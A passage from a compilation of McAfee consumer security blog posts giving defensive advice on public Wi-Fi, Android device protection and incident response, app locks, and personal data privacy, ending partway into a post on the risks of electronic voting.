    6. Review and manage your cloud backup settings: Cloud services often sync Wi-Fi passwords and network settings across devices, which can create unexpected security risks. Check your iCloud, Google, or Microsoft account settings to control which network information gets backed up and shared between your devices.
    7. Keep your router firmware updated and monitor connected devices: Manufacturers regularly release security patches to address newly discovered vulnerabilities. Enable automatic firmware updates when possible, and regularly review your router’s connected devices list to spot any unauthorized access attempts that could lead to wireless identity theft.
    8. Monitor your network regularly: Set up ongoing monitoring through your router’s logging features or third-party network monitoring tools to detect future unauthorized access attempts and maintain awareness of your network’s security status.

    If you must connect to public Wi-Fi

    • Use your cellular hotspot instead: Your phone’s mobile data connection is far more secure than any public Wi-Fi network. Enable hotspot mode and connect your laptop or tablet to avoid the risks of unprotected Wi-Fi entirely.
    • Enable HTTPS-only mode in your browser: In Chrome, go to Settings > Privacy and Security > Security and enable “Always use secure connections.” For Firefox, visit Settings > Privacy & Security and check “HTTPS-Only Mode.” This prevents wireless attacks that intercept unencrypted traffic.
    • Configure DNS encryption: Use secure DNS services like Cloudflare (1.1.1.1) or Quad9 (9.9.9.9) in your device settings. On Windows, go to Settings > Network & Internet > Advanced network settings > Change adapter options, then configure DNS servers in your connection properties.
    • Disable automatic Wi-Fi connections: On iOS, go to Settings > Wi-Fi and turn off “Auto-Join” for public networks. On Android, navigate to Settings > Network & internet > Wi-Fi > Wi-Fi preferences and disable “Connect to open networks.” This prevents automatic connecting to potentially dangerous networks.
    • Enable multi-factor authentication and use passkeys: Protect your accounts with MFA through apps like Google Authenticator or Microsoft Authenticator. When available, choose passkeys over passwords, which are more resistant to phishing and man-in-the-middle attacks.
    • Avoid sensitive tasks on public Wi-Fi: Never access banking, make financial transactions, or log into administrative accounts while connected to public networks. Save these activities for your secure home network or use your cellular data connection instead.
    • Forget networks after use: Always remove public Wi-Fi networks from your saved connections when you leave. On your device’s Wi-Fi settings, select the network and choose “Forget” or “Remove” to prevent automatic reconnection to potentially compromised networks.
    • Verify network authenticity: Before connecting, confirm the exact network name and password with venue staff. Attackers often create fake networks with similar names, such as “Free_WiFi” or “Hotel_Guest,” to capture your data.
    • Keep your device updated: Install security updates promptly on all devices. These patches often fix vulnerabilities that could be exploited on public networks, helping you stay protected.
    • Use a reputable VPN service: When you must use public Wi-Fi, connect through a trusted virtual private network to encrypt all your traffic and create a secure tunnel that protects your data even on compromised networks.

    Final thoughts

    To guard your network or device from hacking attempts, take action today by updating your router’s firmware and passwords, reviewing and removing unnecessary saved networks from your devices, and enabling multi-factor authentication on all your important accounts. These small, but consistent steps will deliver tangible benefits to your daily digital activities.

    For better security, subscribe to an identity theft protection service such as McAfee+, which offers proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your accounts. All things considered, the investment in these security measures is minimal compared to the peace of mind they provide.

    The post Verify Secure Wireless Networks to Prevent Identity Theft appeared first on McAfee Blog.

    Guard Your Android Phones Against Loss of Data and Infected Apps

    By: McAfee
    mobile spyware affecting battery

    Because Android uses an open source operating system, it usually gets a bad rap for being vulnerable to data loss and compromised apps as a result of malware, insecure app coding, unprotected cloud storage, outdated software, sideloading from untrusted sources, and even specific website vulnerabilities. Suffice it to say that any of these risks can be destructive and costly.

    While Google addresses specific vulnerabilities, cyberthreats continue to evolve as criminals become more scheming or desperate. For these reasons, it is still best to exercise caution to protect the data on your device. In this article, we will share vital tips on how you can secure your device.

    Essential tips for Android security

    Determining if you’re vulnerable isn’t always easy. There are, however, some measures you can take to protect your device.

    Keep your Android OS and security patches updated

    Your first line of defense against Android vulnerability threats is maintaining current software. Android security patches fix security weaknesses that cybercriminals actively take advantage of to access your personal data, install malware, or take control of your device. When you delay updates, you leave known security gaps open for attackers to exploit.

    To enable automatic updates, navigate to Settings > System > System update > Advanced settings, then toggle on “Automatic system updates.” For Google Pixel devices, security updates typically arrive monthly, while other manufacturers may have varying schedules.

    On top of this, set your Google Play Store to auto-update apps by opening the Play Store, tapping your profile picture, going to Settings > Network preferences > Auto-update apps, and selecting “Over any network” if you have unlimited data or “Over Wi-Fi only” to preserve your data plan.

    Install apps only from Google Play Store and verify developer permissions

    One of the most effective Android phone security best practices is restricting app installations to the Google Play Store. Sideloading apps from unknown sources significantly increases your risk of installing malware, spyware, or apps with hidden malicious functionality.

    Before installing any app, examine the permissions it requests. Apps asking for excessive permissions should raise your suspicions. Navigate to Settings > Apps > Special app access > Install unknown apps and ensure all toggles are disabled.

    In addition, choose apps with consistent positive ratings and active developer responses to user concerns. Google’s Play Console policies provide guidelines for safe app development, but your vigilance remains essential.

    Enable Google Play Protect and Safe Browsing in Chrome

    Google Play Protect scans over 125 billion apps daily for malware and policy violations. While not perfect, this automated screening catches the majority of malicious apps before they reach your device, and even detects them after installation. In contrast, apps outside this ecosystem lack this protection layer.

    Activate Play Protect by opening Google Play Store, tapping your profile picture, selecting “Play Protect,” and ensuring both “Scan apps with Play Protect” and “Improve harmful app detection” are enabled. This service runs automatic security scans and can remove or disable harmful apps even after you’ve installed them.

    For comprehensive, real-time protection against phishing sites, malware downloads, and suspicious web content, enable safe browsing Android features in Chrome. Open Chrome, tap the three dots menu, go to Settings > Privacy and security > Safe Browsing, and select “Enhanced protection.” This setting checks URLs against Google’s constantly updated database of dangerous sites.

    Use strong screen lock, biometric authentication, and 2FA

    Modern Android devices offer multiple authentication methods, and using them strategically provides layered security for your most sensitive information. Set up a strong screen lock by going to Settings > Security > Screen lock and choosing either a complex PIN with at least 6 digits, a pattern with at least 6 points, or a password that combines letters, numbers, and symbols.

    Enable biometric authentication, whether fingerprint and/or facial recognition, as an additional layer, but always maintain a strong backup PIN or password since biometrics can be circumvented.

    For critical applications containing sensitive data such as banking apps, password managers, email clients, and social media, enable two-factor authentication (2FA) where possible for extra security.

    Enable automatic cloud backups and device encryption

    Android’s built-in backup and encryption features provide essential protection against data loss from device theft, hardware failure, malware attacks, or accidental deletion, forming a crucial part of your Android incident response strategy.

    Enable automatic backups of your app data, call history, and device settings by navigating to Settings > System > Backup, then toggle on “Back up to Google Drive.” You can set the frequency to daily. For photos and videos, enable Google Photos backup with high-quality or original quality settings based on your storage plan.
    Device encryption can be activated through Settings > Security > Encryption & credentials > Encrypt phone. Modern Android devices (Android 6.0+) typically have encryption enabled by default, but you will need to verify this setting. Google’s Android backup service documentation provides detailed information on what data is protected and how to manage your backup settings effectively.

    Set up Google account recovery options

    Your Google account serves as the master key to most Android functionality, so having an account recovery system can be invaluable to restore access to your device when local authentication methods fail. To ensure your recovery information is current, visit Security settings on your account profile, add a secondary email address that you can access independently, but avoid using another Gmail account as your backup. Include a mobile phone number for SMS verification, and consider adding multiple phone numbers if you frequently travel or change devices.

    Google also provides one-time-use back-up codes that can restore account access when other methods fail. Download these codes and store them securely offline. Consider using a password manager like Google’s built-in option or a reputable third-party solution. Never store recovery codes in easily accessible digital formats like unencrypted text files or photos on the same device.

    Configure Find My Device for remote management

    Google’s Find My Device service provides powerful remote management capabilities that can prevent permanent data loss during Android vulnerability situations or lockout scenarios. This service allows you to locate, lock, or completely erase your device remotely.

    To enable this feature, navigate to Find My Device through Settings > Security > Find My Device. Ensure that your location services remain active for this feature to function properly.

    Take note that when you decide to remotely erase your data from your device, this feature completely wipes all local data but preserves the information you backed up to Google’s cloud services. Only use this option when you’re certain your back-up systems are current.

    Implement comprehensive backup strategies

    Android offers multiple backup solutions that transform potential data disasters into minor inconveniences. To store your photos, videos, SMS messages, and call logs, you can go to Settings > System > Backup and choose the frequency that matches your usage patterns, daily backups for heavy users, weekly for lighter usage.

    For sensitive information that you would like to access even when offline, you might want to consider periodic local backups by connecting your device to a computer monthly and copying important files manually. Test your systems regularly by attempting to restore a small amount of data to ensure your backups work when needed and identify any gaps in your protection strategy.

    Mobile incident response for Android

    A mobile security incident can escalate from a nuisance to real damage in minutes, especially if an attacker can access your accounts, intercept messages, or install persistent apps. Speed matters when you respond, especially when prioritizing the high-impact steps that will stop the bleeding, regain control, and protect your data before you move on to cleanup and recovery. The actions below follow that order, so you can respond calmly and effectively even under stress.

    1. Disconnect from untrusted networks immediately: Turn off Wi-Fi and mobile data instantly to prevent unauthorized access to your accounts or further data theft. Switch to airplane mode if you suspect active malware communication. Once disconnected, you can assess the situation and secure your device and accounts.
    2. Use Find My Device to secure your device remotely: From a trusted computer or another device, go to Google’s Find My Device and lock your smartphone with a new passcode, display a message with contact information, or completely erase the device if necessary.
    3. Change critical account passwords and enable MFA: From a trusted device, immediately update your passwords for critical accounts linked to your phone such as email, banking, social media, and other services containing personal or financial information. Add authentication methods where available and document which passwords were changed to avoid confusion later.
    4. Review and remove suspicious apps and permissions: Check your device’s app installation history by going to Google Play Store > Menu > My apps & games > Installed and remove any you don’t recognize or trust. Next, review app permissions by going to Settings > Apps & notifications > Permission manager and revoke unnecessary permissions for location services, camera, microphone, contacts, messages, and administrative privileges.
    5. Update your operating system: Ensure your device is running the latest version of its operating system by going to Settings > System > System update and enable automatic updates. Also update your installed apps by downloading new versions on your device’s app store. If your device is older and no longer receives security updates, consider upgrading to a supported model.
    6. Restore from a known-good backup: Consider restoring your device to a trusted version, before the security incident occurred. A word of caution: this will remove any data created after the backup date, so weigh the security benefits against potential data loss.
    7. File appropriate reports with relevant authorities: Document the incident and report it to appropriate authorities. If you suspect SIM swapping or carrier-related fraud, contact your mobile carrier immediately. Report identity theft to the Federal Trade Commission and Internet Crime Complaint Center. For incidents involving financial accounts, contact your bank, credit card company, and the major credit bureaus.
    8. Monitor accounts and set up security alerts: Continue monitoring your accounts to detect any lingering effects of the security incident and prevent future compromises. Enable account activity notifications for all critical services, consider using a credit monitoring service, and review your credit reports regularly for unauthorized accounts or inquiries. Set up Google Alerts for your name and other personal information to catch potential identity theft attempts.
    9. Get a mobile security solution: As Android devices become increasingly central to our lives, protecting them with a comprehensive mobile security solution has become essential. A robust mobile security app works continuously to identify and neutralize threats before they can compromise your device or steal your data.

    Key capabilities of a reliable mobile security solution

    When evaluating mobile security solutions for your Android device, focus on apps that offer comprehensive protection across multiple threat vectors. The most effective solutions combine several key capabilities into a single, user-friendly platform that doesn’t slow down your device or drain your battery.

    • Web protection and safe browsing: Safe browsing protection has become increasingly important as cybercriminals focus on phishing attacks and malicious websites that exploit smartphone vulnerabilities. Your mobile security solution should work seamlessly with your preferred browser, whether that’s Chrome, Firefox, or another popular option.
    • Wi-Fi security and network protection: Your security app should be able to monitor and check for signs of compromise and malicious hotspots, and alert you to networks attempting to intercept your data. It should also have virtual private network capabilities, encrypting your internet traffic even when connected to potentially unsafe networks to ensure that even if your connection is intercepted, your actual data remains unreadable to attackers.
    • Identity monitoring and privacy protection: A trusted security solution will include robust identity monitoring features that detect signs of unauthorized use of your personal information. Comprehensive identity monitoring encompasses credit monitoring and surveillance of the dark web, social media platforms, and data broker sites.

    Final thoughts

    Your Android device holds your most precious digital memories, important work files, and personal information, making it a prime target for cybercriminals who continue to exploit new vulnerabilities. While threats like remote factory resets and malicious web attacks can disrupt your daily digital routine, you do have the power to protect yourself against them by keeping your OS and security patches current, enabling Google Play Protect and built-in safe browsing features, maintaining regular backups of your essential data, and considering a comprehensive mobile security solution that provides real-time protection. For additional steps to safeguard your Android mobile life, visit McAfee’s security best practices.

    The post Guard Your Android Phones Against Loss of Data and Infected Apps appeared first on McAfee Blog.

    App Locks Can Improve the Security of Your Mobile Phones

    By: McAfee
    mobile apps on a phone

    The practice of locking our possessions is relevant in every aspect of our modern lives. We physically lock our houses, cars, bikes, hotel rooms, computers, and even our luggage when we go to the airport. There are lockers at gyms, schools, amusement parks, and sometimes even at the workplace.

    Digitally, we lock our phones with passcodes and protect them from malware with a security solution. Why, then, don’t we lock the individual apps that house some of our most personal and sensitive data?

    From photos to emails to credit card numbers, our mobile apps hold invaluable data that is often left unprotected, especially given that some of the most commonly used apps on the Android platform such as Facebook, LinkedIn and Gmail don’t necessarily require a log in each time they’re launched.

    Without an added layer of security, those apps are leaving room for nosy family members, jealous significant others, prankster friends, and worst of all thieves to hack into your social media or email accounts at the drop of a hat. In this article, we will discuss what an app lock is, everyday scenarios you may need it, and how to set it up on your smartphone.

    Your apps hold details of your life

    Your mobile phone is more than just a gadget. It’s your wallet, camera, diary, and connection to the world. You likely keep photos, messages, social media, payment apps, and even confidential work files on it. To protect these bits of personal information, we use PINs, patterns, or biometrics to lock our devices, but once the phone is open, every app is fair game.

    I f someone were able to go beyond your phone’s lock screen and gain access to the information in your phone, how much of your life could they see? A friend could scroll through your photos. Your child could open your shopping app and make purchases. Or a thief could get into your banking and social media accounts in seconds.

    One way to avoid this from happening is by applying an app lock, a digital padlock that adds an authentication step such as a password, pattern, or biometric before an application can be launched.

    Device locks aren’t enough

    In your home, a locked front door keeps strangers out. But what happens if you unwittingly leave the front door unlocked and someone walks in? Without interior locks, your bedroom, office, and safe are now accessible to anyone.

    This same concept applies to your device with unprotected apps. Once unlocked, apps like Gmail, Facebook, or mobile banking don’t always require you to log in every time. It’s convenient, until it’s not.

    An app lock serves as an indoor lock, protecting your sensitive data even after an unauthorized person has accessed it, and maintaining privacy boundaries.

    When you or another person attempts to open an app on your device, the system first triggers an authentication screen. After verifying your PIN, fingerprint, or face, the app will open, ensuring that your personal information stays off-limits to people who do not know your authentication step. In Android, app locks work seamlessly in the background without slowing performance.

    This layered defense mirrors the cybersecurity approach used on enterprise systems, but scaled down for consumers. Each layer handles different threats, so if one fails, the others still protect you:

    • Your phone’s screen lock guards the device.
    • Your antivirus protects against malware.
    • Your app lock safeguards the personal data inside.

    Everyday scenarios where app locks matter

    • Family and shared devices: If you are a parent, you might lend your phone to your child for a game. Within minutes, they’ve opened your email app or shopping account. With app lock, you can hand over your device without worrying they’ll see or purchase something they shouldn’t.
    • Friends and social moments: You’re showing photos to a friend, and they accidentally swipe into your text or social media messages. An app lock keeps your private conversations private, no explanations needed.
    • Traveling and public use: Whether you’re going through airport security or connecting to public Wi-Fi, app locks ensure that even an unlocked device doesn’t expose your sensitive apps if your phone is stolen or misplaced.
    • Work and personal boundaries: Many professionals use personal phones for work. App locks separate business and personal data, securing email, document-sharing apps, and collaboration tools from family members or friends who borrow your device.

    The risks of unprotected apps

    Leaving apps unprotected can do more than just embarrass you. Here are some examples of how unprotected apps could lead to lasting harm:

    • Email access lets intruders reset passwords for your other accounts and eventually lock you out. This applies not only to your personal email, but also to your corporate email account if you have a work profile on your phone.
    • Social media enables hackers to impersonate you, violate your privacy or that of the people around you, or post malicious content that could damage your reputation and personal relationships.
    • Banking and finance apps provide direct access to your money and accounts. Aside from the financial loss, cybercriminals who gain access to your accounts could apply for loans in your name or commit financial fraud in your name.
    • Photo galleries reveal personal images, family details, or screenshots containing sensitive data.

    Even just one unauthorized session could cascade into identity theft or financial fraud. That’s why security experts recommend app-level protection as part of a layered, reinforced mobile defense strategy.

    Your guide to setting up your app locks on Android

    While many Android phones include some app-locking capabilities, dedicated mobile security apps provide more robust options and better protection. Here’s how to set up app locks effectively:

    1. Choose a strong authentication method

    Use a 6-digit or longer PIN, complex pattern, or biometric such as fingerprint or face unlock. Avoid using the same PIN as your main device.

    2. Select which apps to protect

    Choose the priority mobile apps that you want to protect. Start with your most sensitive apps, such as:

    • Banking and finance
    • Email and messaging
    • Cloud storage
    • Photo gallery
    • Shopping apps with saved payment info

    3. Adjust lock timers for convenience

    Set timeouts based on app sensitivity:

    • Banking and shopping: Lock these immediately after you finish using them. This gives prying eyes zero chances to intercept your information.
    • Messaging: You can be more lenient here. Allow for a 30- to 60-second delay in case you have additional thoughts to communicate.
    • Work apps: For continuity, you can permit short delays in locking work apps during business hours. But once you leave work, you can set up the app locks to immediately activate.

    4. Manage notifications and privacy

    Hide notification content for locked apps. This keeps private messages or bank alerts from showing up on your lock screen.

    The advantage of dedicated app locks

    Most Android manufacturers now offer convenient, built-in app locking features. However, they are limited, often lacking biometric integration, cloud backup, or smart settings.

    Dedicated solutions go further, providing:

    • Seamless biometric access
    • Anti-tampering protection
    • Stealth mode to hide locked apps from view
    • Remote access controls if your phone is lost or stolen
    • Integrated alerts for suspicious log-in attempts

    With an app lock, your mischievous friends will never be able to post embarrassing status updates on your Facebook profile, and your jealous partner won’t be able to snoop through your photos or emails. For parents, you can keep your kids locked out of the apps that would allow them to access inappropriate content without having to watch their every move.

    Most importantly, app locks protect you from thieves and strangers in case of a stolen or lost device.

    Final thoughts

    Your phone carries more than just apps. It holds the details of your daily life. From private conversations and family photos to financial information and work data, much of what matters most to you lives behind those app icons. While a device lock is an important first step, it isn’t always enough on its own.

    App locks give you greater control over your privacy by protecting individual apps, even when your phone is already unlocked. They help prevent accidental access, discourage snooping, and reduce the risk of serious harm if your device is lost or stolen. Most importantly, they allow you to use and share your phone, without worrying about who might see what they shouldn’t.

    By adding app-level protection to your mobile security routine, you’re taking a simple but meaningful step toward safeguarding your personal information.

    The post App Locks Can Improve the Security of Your Mobile Phones appeared first on McAfee Blog.

    What Does It Take To Be Digitally Secure?

    By: McAfee
    woman taking a digital detox

    It’s no longer possible to deny that your life in the physical world and your digital life are one and the same. Coming to terms with this reality will help you make better decisions in many aspects of your life.

    The same identity you use at work, at home, and with friends also exists in apps, inboxes, accounts, devices, and databases, whether you actively post online or prefer to stay quiet. Every purchase, login, location ping, and message leaves a trail. And that trail shapes what people, companies, and scammers can learn about you, how they can reach you, and what they might try to take.

    That’s why digital security isn’t just an IT or a “tech person” problem. It’s a daily life skill. When you understand how your digital life works, what information you’re sharing, where it’s stored, and how it can be misused, you make better decisions. This guide is designed to help you build that awareness and translate it into practical habits: protecting your data, securing your accounts, and staying in control of your privacy in a world that’s always connected.

    The essence of digital security

    Being digitally secure doesn’t mean hiding from the internet or using complicated tools you don’t understand. It means having intentional control over your digital life to reduce risks while still being able to live, work, and communicate online safely. A digitally secure person focuses on four interconnected areas:

    Personal information

    Your personal data is the foundation of your digital identity. Protecting it includes limiting how much data you share, understanding where it’s stored, and reducing how easily it can be collected, sold, or stolen. At its heart, personal information falls into two critical categories that require different levels of protection:

    • Personally identifiable information (PII):This represents the core data that defines you, such as your name, contact details, financial data, health information, location history, Social Security number, driver’s license number, passport information, home address, and online behavior. Financial data such as bank account numbers, credit card details, and tax identification numbers also fall into this category. Medical information, including health insurance numbers and medical records, represents some of your most sensitive PII that requires the highest level of protection.
    • Sensitive personal data:While not always directly identifying you, this type of information can be used to build a comprehensive profile of your life and activities. This includes your phone number, email address, employment details, educational background, and family information. Your online activities, browsing history, location data, and social media posts also constitute sensitive personal data that can reveal patterns about your behavior, preferences, and daily routines.

    Digital accounts

    Account security ensures that only you can access them. Strong, unique passwords, multi-factor authentication, and secure recovery options prevent criminals from hijacking your email, banking, cloud storage, social media, and other online accounts, often the gateway to everything else in your digital life.

    Privacy

    Privacy control means setting boundaries and deciding who can see what about you, and under what circumstances. This includes managing social media visibility, app permissions, browser tracking, and third-party access to your data.

    Digital security is an ongoing effort as threats evolve, platforms change their policies, and new technologies introduce new risks. Staying digitally secure requires periodic check-ins, learning to recognize scams and manipulation, and adjusting your habits as the digital landscape changes.

    Common exposure points in daily digital life

    Your personal information faces exposure risks through multiple channels during routine digital activities, often without your explicit knowledge.

    • Public Wi-Fi networks: When you connect to unsecured networks in coffee shops, airports, hotels, or retail locations, your internet traffic can be intercepted by cybercriminals using the same network. This puts your login credentials, banking information, and communications at risk, even on networks that appear secure.
    • Data brokers: These companies gather data, often without your explicit knowledge, from public records, social media platforms, online purchases, and other digital activities to create your profile. They then sell this information to marketers, employers, and other interested parties.
    • Social media: When you overshare details about your location, vacation plans, family members, workplace, or daily routines, you provide cybercriminals with valuable information for identity theft and social engineering attacks. Regular platform policy changes can reset your previously private information or expose you to data breaches.
    • Third-party applications: Mobile apps, browser extensions, and online services frequently collect more data than necessary for their stated functionality, creating additional privacy risks for you. You could be granting these apps permission to access your personal data, contacts, location, camera, and other device functions without fully understanding how your data will be used, stored, or shared.
    • Web trackers: These small pieces of code embedded in websites follow your browsing behavior, monitoring which sites you visit, how long you stay, what you click on, and even where you move your mouse cursor. Advertising networks use this information to build a profile of your interests and online habits to serve you targeted ads.

    Core pillars of digital security

    Implementing comprehensive personal data protection requires a systematic approach that addresses the common exposure points. These practical steps provide layers of security that work together to minimize your exposure to identity theft and fraud.

    Minimize data sharing across platforms

    Start by conducting a thorough audit of your online accounts and subscriptions to identify where you have unnecessarily shared more data than needed. Remove or minimize details that aren’t essential for the service to function. Moving forward, provide only the minimum required information to new accounts and avoid linking them across different platforms unless necessary.

    Be particularly cautious with loyalty programs, surveys, and promotional offers that ask for extensive personal information, as they may share it with third parties. Read privacy policies carefully, focusing on sections that describe data sharing, retention periods, and your rights regarding your personal information.

    If possible, consider using separate email addresses for different accounts to limit cross-platform tracking and reduce the impact if one account is compromised. Create dedicated email addresses for shopping, social media, newsletters, and important accounts like banking and healthcare.

    Adjust account privacy settings

    Privacy protection requires regular attention to your account settings across all platforms and services you use. Social media platforms frequently update their privacy policies and settings, often defaulting to less private configurations that allow them to collect and share your data. For this reason, it is a good idea to review your privacy settings at least quarterly. Limit who can see your posts, contact information, and friend lists. Disable location tracking, facial recognition, and advertising customization features that rely on your personal data. Turn off automatic photo tagging and prevent search engines from indexing your profile.

    On Google accounts, visit your Activity Controls and disable Web & App Activity, Location History, and YouTube History to stop this data from being saved. You can even opt out of ad personalization entirely if desired by adjusting Google Ad Settings. If you are more tech savvy, Google Takeout allows you to export and review what data Google has collected about you.

    For Apple ID accounts, you can navigate to System Preferences on Mac or Settings on iOS devices to disable location-based Apple ads, limit app tracking, and review which apps have access to your contacts, photos, and other personal data.

    Meanwhile, Amazon accounts store extensive purchase history, voice recordings from Alexa devices, and browsing behavior. Review your privacy settings to limit data sharing with third parties, delete voice recordings, and manage your advertising preferences.

    Limit app permissions

    Regularly audit the permissions you’ve granted to installed applications. Many apps request far more permissions to your location, contacts, camera, and microphone even though they don’t need them. Cancel these unnecessary permissions, and be particularly cautious about granting access to sensitive data.

    Use strong passwords and multi-factor authentication

    Create passwords that actually protect you; they should be long and complex enough that even sophisticated attacks can’t easily break them. Combine uppercase letters, lowercase letters, numbers, and special characters to make it harder for attackers to crack.

    Aside from passwords, enable multi-factor authentication (MFA) on your most critical accounts: banking and financial services, email, cloud storage, social media, work, and healthcare. Use authenticator apps such as Google Authenticator, Microsoft Authenticator, or Authy rather than SMS-based authentication when possible, as text messages can be intercepted through SIM swapping attacks. When setting up MFA, ensure you save backup codes in a secure location and register multiple devices when possible to keep you from being locked out of your accounts if your primary authentication device is lost, stolen, or damaged.

    Alternatively, many services now offer passkeys which use cryptographic keys stored on your device, providing stronger security than passwords while being more convenient to use. Consider adopting passkeys for accounts that support them, particularly for your most sensitive accounts.

    Enable device encryption and automatic backups

    Device encryption protects your personal information if your smartphone, tablet, or laptop is lost, stolen, or accessed without authorization. Modern devices typically offer built-in encryption options that are easy to enable and don’t noticeably impact performance.

    You can implement automatic backup systems such as secure cloud storage services, and ensure backup data is protected. iOS users can utilize encrypted iCloud backups, while Android users should enable Google backup with encryption. Regularly test your backup systems to ensure they’re working correctly and that you can successfully restore your data when needed.

    Request data deletion and opt out from data brokers

    Identify major data brokers that likely have your information and look for their privacy policy or opt-out procedures, which often involves submitting a request with your personal information and waiting for confirmation that your data has been removed.

    In addition, review your subscriptions and memberships to identify services you no longer use. Request account deletion rather than simply closing accounts, as many companies retain data from closed accounts. When requesting deletion, ask specifically for all personal data to be removed from their systems, including backups and archives.

    Keep records of your opt-out and deletion requests, and follow up if you don’t receive confirmation within the stated timeframe. In the United States, key data broker companies include Acxiom, LexisNexis, Experian, Equifax, TransUnion, Whitepages, Spokeo, BeenVerified, and PeopleFinder. Visit each company’s website.

    Use only trusted, secure networks

    Connect only to trusted, secure networks to reduce the risk of your data being intercepted by attackers lurking behind unsecured or fake Wi-Fi connections. Avoid logging into sensitive accounts on public networks in coffee shops, airports, or hotels, and use encrypted connections such as HTTPS or a virtual private network to hide your IP address and block third parties from monitoring your online activities.

    Rather than using a free VPN service that often collects and sells your data to generate revenue, it is better to choose a premium, reputable VPN service that doesn’t log your browsing activities and offers servers in multiple locations.

    Ongoing monitoring and maintenance habits

    Cyber threats evolve constantly, privacy policies change, and new services collect different types of personal information, making personal data protection an ongoing process rather than a one-time task. Here are measures to help regularly maintain your personal data protection:

    • Quarterly reviews: Set up a quarterly review process to examine your privacy settings across all platforms and services. Create a calendar reminder to check your social media privacy settings, review app permissions on your devices, and audit your online accounts for unused services that should be deleted.
    • Credit monitoring: Monitor your financial accounts regularly for unauthorized activity and consider using credit monitoring services to alert you to potential identity theft.
    • Breach alerts: Stay informed about data breaches in the services you use by signing up for breach notification services. If a breach occurs, this will allow you to take immediate action to change passwords, monitor affected accounts, and consider additional security measures for compromised services.
    • Device updates: Enable automatic security and software updates on your devices, as these updates include important privacy and security improvements that protect you from newly discovered vulnerabilities.
    • Education and awareness: Stay informed about new privacy risks, learn about emerging protective technologies, and share knowledge with family members and friends who may benefit from improved personal data protection practices.

    By implementing these systematic approaches and maintaining regular attention to your privacy settings and data sharing practices, you significantly reduce your risk of identity theft and fraud while maintaining greater control over your digital presence and personal information.

    Final thoughts

    You don’t need to dramatically overhaul your entire digital security in one day, but you can start making meaningful improvements right now. Taking action today, even small steps, builds the foundation for stronger personal data protection and peace of mind in your digital life. Choose one critical account, update its password, enable multi-factor authentication, and you’ll already be significantly more secure than you were this morning. Your future self will thank you for taking these proactive steps to protect what matters most to you.

    Every step you take toward better privacy protection strengthens your overall digital security and reduces your risk of becoming a victim of scams, identity theft, or unwanted surveillance. You’ve already taken the first step by learning about digital security risks and solutions. Now it’s time to put that knowledge into action with practical steps that fit seamlessly into your digital routine.

    The post What Does It Take To Be Digitally Secure? appeared first on McAfee Blog.

    Hack the Vote: Pros and Cons of Electronic Voting

    By: McAfee
    vote wallpaper on laptop

    Every four years, scores of American people flood churches, schools, homes, and auditoriums to cast their ballots for the future of American leadership. But amid the highs and lows of election night, there is an ongoing conversation about how the votes are being counted.

    As results slowly roll in, voters struggle with long lines and faulty machinery in key battleground states, prompting debates on the efficiency of the U.S. voting process. In an age where American Idol results can be instantaneously transmitted over a mobile device, why are we still feeding paper ballots into machines that look like props from ‘90s movies?

    On the one hand, countries like Canada, Norway and Australia have already experienced success with their adoption of online voting systems, and proponents say going digital will boost voter turnout and Election Day efficiency. On the other, naysayers cite hacking, malware, and other security threats as deal-breakers that could threaten the backbone of American democracy.

    So what are the facts behind this debate? Below, we’ve outlined key arguments for and against online, email, and electronic voting systems, to help users at home move beyond the pre-election campaign hype.

    Electronic voting: Better or worse than paper ballots?

    Since there have been elections, there have been people tampering with votes. Given this, experts are justifiably concerned with any technology that could introduce new points of access to the data stored during an election. Nevertheless, a handful of states now use electronic voting machines exclusively—Delaware, Georgia, Louisiana, New Jersey and South Carolina—and even notorious battleground states Ohio and Florida have made the move toward paperless votes.

    The concern is that when there is no physical ballot, it becomes next to impossible to determine if there has been tampering—especially in the case of a close election. The contested 2000 Bush-Gore race comes to mind as an example of the stark importance of reliable election machinery. In 2012, Pennsylvania voting machines were taken out of service after being captured on video changing votes from one candidate to another.

    Still, most of these machines now supply a paper trail to guard against tampering, and a vast majority undergo frequent, mandatory testing. The machines are also not connected to the Internet and are segregated from any network-connected devices. In terms of physical security, the machines themselves are secured with locks and tamper-evident seals, and they’re heavily protected when transported to and from polling places.

    Hacking the vote: It’s easier than you think

    While electronic voting promises efficiency and convenience, the reality is that these systems face significant vulnerabilities that make them easy targets for hacking.

    Attackers don’t need to hack every voting machine individually. They only need to target the broader voting ecosystem through several key attack vectors. For one, supply chain risks represent one of the most concerning threats, where malicious components or software can be introduced during manufacturing or updates. Misconfigured systems and outdated firmware create entry points that cybercriminals actively seek out, while exposed network ports can provide side-channel access to supposedly isolated voting infrastructure.

    Beyond direct machine tampering, sophisticated attacks focus on ballot definition files—the digital templates that determine how votes are recorded and counted. Manipulating these files can alter election outcomes without voters realizing it. Similarly, result reporting systems that transmit vote tallies from polling locations to central counting facilities present attractive targets for those seeking to disrupt electoral processes.

    Recent security research demonstrates these vulnerabilities aren’t theoretical. In 2003, cybersecurity researchers at Johns Hopkins University documented significant security gaps in widely used electronic voting systems during controlled testing environments, revealing that basic network intrusion techniques could compromise vote tallies without detection. Meanwhile, a 2022 audit conducted by election security experts in Georgia identified configuration errors in electronic polling systems that could have allowed unauthorized access to voter data and ballot information.

    Perhaps more concerning is how disinformation campaigns around unofficial election results can amplify doubts about electoral integrity, regardless of actual system security. These campaigns often spread false information about electronic voting fraud or online voting hack attempts, creating confusion that undermines public trust in legitimate election outcomes.

    It’s crucial to understand that the primary impact of these vulnerabilities often isn’t direct vote manipulation—it’s the erosion of voter confidence in our democratic processes. When people doubt that their votes count accurately, it weakens the foundation of democratic participation.

    Privacy & security concerns in online voting

    Will our presidential elections ever go the way of American Idol? Despite advances in technology, the vast majority of Americans must vote in person or via mail-in ballot. At present, only very limited electronic voting options exist, primarily for specific voter groups and circumstances, such as:

    • Military and overseas voters: The Uniformed and Overseas Citizens Absentee Voting Act (UOCAVA) allows military personnel and overseas citizens to return marked ballots electronically in some states. However, this typically involves downloading a ballot, marking it, and returning it via secure email or portal—not full online voting.
    • Voters with disabilities: These accommodations vary by state. Some states offer electronic ballot marking tools or accessible voting systems for voters with disabilities. These systems often allow electronic marking but require printing ballots for submission, maintaining a paper trail for verification.
    • Citizens displaced by natural disasters: During an election cycle when many New Jersey residents were affected by Hurricane Sandy, officials established email as an alternative voting method. But as Election Day loomed, the system was soon blamed for a slew of issues.

    Vulnerabilities in online voting systems

    Understanding the vulnerabilities that plague electronic voting systems isn’t about creating fear, but about building stronger defenses. Below, we have listed some of the potential attack vectors to help you make informed decisions about digital democracy.

    The email software

